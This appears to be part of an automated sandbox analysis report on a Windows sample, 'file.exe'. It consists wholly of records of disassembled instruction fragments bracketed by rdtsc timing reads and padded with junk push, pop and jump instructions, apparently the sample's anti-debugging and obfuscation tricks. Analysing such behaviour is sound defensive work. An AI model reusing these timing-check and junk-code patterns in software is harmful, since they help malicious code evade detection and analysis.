                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F57B7 second address: 7F57BC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F5D93 second address: 7F5D97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F5D97 second address: 7F5DB6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F701CDA8A6Ah 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 jp 00007F701CDA8A66h 0x00000019 pop edx 0x0000001a push ecx 0x0000001b pushad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F60DF second address: 7F6115 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F701CDC8376h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F701CDC837Eh 0x00000014 jmp 00007F701CDC8387h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 746A5A second address: 746AB5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F701CDA8A70h 0x00000007 pushad 0x00000008 jne 00007F701CDA8A66h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 pop eax 0x00000012 jmp 00007F701CDA8A6Ch 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d jmp 00007F701CDA8A6Ah 0x00000022 jmp 00007F701CDA8A6Ah 0x00000027 jmp 00007F701CDA8A72h 0x0000002c pushad 0x0000002d popad 0x0000002e popad 0x0000002f push eax 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 746AB5 second address: 746ABA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FFBD3 second address: 7FFBD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FFBD7 second address: 7FFBE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F701CDC8376h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80028D second address: 800293 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 800293 second address: 800297 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74A1EE second address: 74A1FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pushad 0x00000006 popad 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74A1FC second address: 74A206 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F701CDC8376h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74A206 second address: 74A23C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F701CDA8A79h 0x00000008 jmp 00007F701CDA8A71h 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 jc 00007F701CDA8A66h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74A23C second address: 74A240 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80B2E6 second address: 80B2FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007F701CDA8A66h 0x0000000f jns 00007F701CDA8A66h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 809616 second address: 80961A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80961A second address: 809629 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F701CDA8A66h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 809EC9 second address: 809EDC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F701CDC837Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 809EDC second address: 809EF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F701CDA8A6Bh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80A04A second address: 80A067 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push esi 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F701CDC8382h 0x0000000f pop esi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80A190 second address: 80A19B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80A19B second address: 80A1A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80A1A0 second address: 80A1C3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d je 00007F701CDA8A66h 0x00000013 jno 00007F701CDA8A66h 0x00000019 jl 00007F701CDA8A66h 0x0000001f popad 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80A1C3 second address: 80A1DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F701CDC8383h 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80A1DB second address: 80A1E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80A1E1 second address: 80A1E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80A1E7 second address: 80A1EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80A1EB second address: 80A1F1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80A1F1 second address: 80A1FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 811A6E second address: 811A72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 811A72 second address: 811A81 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F701CDA8A6Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82B31C second address: 82B326 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82B326 second address: 82B380 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F701CDA8A6Bh 0x00000009 popad 0x0000000a popad 0x0000000b pushad 0x0000000c js 00007F701CDA8A7Dh 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007F701CDA8A75h 0x00000019 push esi 0x0000001a jmp 00007F701CDA8A6Ch 0x0000001f jmp 00007F701CDA8A79h 0x00000024 pop esi 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82B380 second address: 82B386 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82B386 second address: 82B3A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a pop eax 0x0000000b jmp 00007F701CDA8A6Fh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82E223 second address: 82E24C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F701CDC8387h 0x00000009 jo 00007F701CDC837Eh 0x0000000f jne 00007F701CDC8376h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82E24C second address: 82E252 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82E252 second address: 82E258 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82E258 second address: 82E25C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 837B04 second address: 837B0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F701CDC8376h 0x0000000a pop ecx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 837B0F second address: 837B19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F701CDA8A66h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 837B19 second address: 837B22 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 840F28 second address: 840F2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 840F2E second address: 840F32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83FFC4 second address: 83FFC9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 840271 second address: 840277 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 840277 second address: 84027B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 843FFE second address: 844002 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 844002 second address: 844006 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 846185 second address: 8461B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jne 00007F701CDC8376h 0x0000000c popad 0x0000000d ja 00007F701CDC838Fh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8461B1 second address: 8461B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 845C8E second address: 845CA6 instructions: 0x00000000 rdtsc 0x00000002 js 00007F701CDC8376h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d jmp 00007F701CDC837Ah 0x00000012 pop esi 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 845CA6 second address: 845CDB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a push edi 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f pop edi 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 jmp 00007F701CDA8A79h 0x00000018 pushad 0x00000019 jnc 00007F701CDA8A66h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 845CDB second address: 845CFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F701CDC8389h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 845E49 second address: 845E66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F701CDA8A78h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 845E66 second address: 845E6B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 845E6B second address: 845E71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 845E71 second address: 845E79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 855A72 second address: 855A8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F701CDA8A6Bh 0x0000000c jl 00007F701CDA8A66h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 855A8C second address: 855A99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007F701CDC837Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 863BD5 second address: 863BF3 instructions: 0x00000000 rdtsc 0x00000002 je 00007F701CDA8A71h 0x00000008 jmp 00007F701CDA8A6Bh 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jg 00007F701CDA8A66h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 873A7E second address: 873A97 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F701CDC8376h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F701CDC837Dh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 873A97 second address: 873AB0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F701CDA8A6Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 873AB0 second address: 873ABC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 872B36 second address: 872B3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 872B3A second address: 872B54 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jno 00007F701CDC8376h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007F701CDC8376h 0x00000014 jl 00007F701CDC8376h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 872B54 second address: 872B5E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 872B5E second address: 872B62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 872B62 second address: 872B89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 pop eax 0x00000009 jmp 00007F701CDA8A6Bh 0x0000000e pop ebx 0x0000000f popad 0x00000010 push ecx 0x00000011 pushad 0x00000012 jmp 00007F701CDA8A6Dh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 872F9A second address: 872FA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 872FA3 second address: 872FAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F701CDA8A66h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 872FAD second address: 872FC3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jng 00007F701CDC8378h 0x0000000e push edi 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push esi 0x00000015 pop esi 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8733CD second address: 8733EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jns 00007F701CDA8A66h 0x0000000d jmp 00007F701CDA8A74h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8733EE second address: 8733F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 873553 second address: 873560 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F701CDA8A66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 873691 second address: 8736B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F701CDC8385h 0x00000009 popad 0x0000000a pop edx 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8736B1 second address: 8736B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87668C second address: 876690 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 876690 second address: 8766A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F701CDA8A70h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 879A4B second address: 879A7D instructions: 0x00000000 rdtsc 0x00000002 jc 00007F701CDC8376h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnl 00007F701CDC837Eh 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 push edi 0x00000016 jnc 00007F701CDC8376h 0x0000001c pop edi 0x0000001d jmp 00007F701CDC837Dh 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 879A7D second address: 879A83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8795F3 second address: 879612 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F701CDC8389h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA020B second address: 4DA0211 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0211 second address: 4DA0215 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0215 second address: 4DA0219 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0219 second address: 4DA0265 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a push ecx 0x0000000b mov edi, 68965888h 0x00000010 pop edi 0x00000011 call 00007F701CDC837Eh 0x00000016 mov si, 0591h 0x0000001a pop eax 0x0000001b popad 0x0000001c push eax 0x0000001d jmp 00007F701CDC837Ch 0x00000022 xchg eax, ebp 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F701CDC8387h 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA02B2 second address: 4DA02B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA02B6 second address: 4DA02BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA02BC second address: 4DA02C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA02C2 second address: 4DA02C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA02C6 second address: 4DA02F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F701CDA8A78h 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F701CDA8A6Dh 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA02F9 second address: 4DA02FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA02FF second address: 4DA0316 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F701CDA8A73h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0316 second address: 4DA0390 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F701CDC8389h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d jmp 00007F701CDC837Ch 0x00000012 pushfd 0x00000013 jmp 00007F701CDC8382h 0x00000018 adc ecx, 66FCAB88h 0x0000001e jmp 00007F701CDC837Bh 0x00000023 popfd 0x00000024 popad 0x00000025 mov ebp, esp 0x00000027 jmp 00007F701CDC8386h 0x0000002c pop ebp 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F701CDC837Ah 0x00000036 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0390 second address: 4DA0396 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
